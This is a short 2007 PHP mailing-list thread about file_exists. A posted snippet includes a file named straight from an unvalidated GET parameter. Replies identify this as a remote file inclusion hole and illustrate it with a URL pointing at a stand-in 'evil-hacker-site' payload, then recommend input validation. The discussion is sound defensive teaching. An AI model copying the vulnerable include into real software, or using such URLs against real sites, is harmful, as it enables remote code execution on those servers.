Instruct ICC wrote:
>
>
>> Date: Thu, 15 Nov 2007 00:20:52 +0000
>> From: stuttle@xxxxxxxxx
>> To: philthathril@xxxxxxxxx
>> CC: php-general@xxxxxxxxxxxxx
>> Subject: Re: file_exists
>>
>> Philip Thompson wrote:
>>> I've run into similar problems where I *thought* I was looking in the
>>> correct location... but I wasn't. Take this for example....
>>>
>>>> $page = $_GET['page'];
>>> if (file_exists ("$page.php")) {
>>> include ("$page.php");
>>> }
>>> ?>
>> I really hope this is not a piece of production code. If it is then you
>> might want to think very hard about what it's doing. If you still can't
>> see a problem let me know!
>>
>
> Called like this?
>
> index.php?page=http://evil-hacker-site.com/evil-payload.php
>
> And the browser will probably url_encode for me if needed.
Yup very dangerous.
Obviously PHP can be configured ot not include/require remote URIs, but
as a defensive programmer you should at very least ensure your
$_GET['page'] var conformes to a validation regexp or something...
Col
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
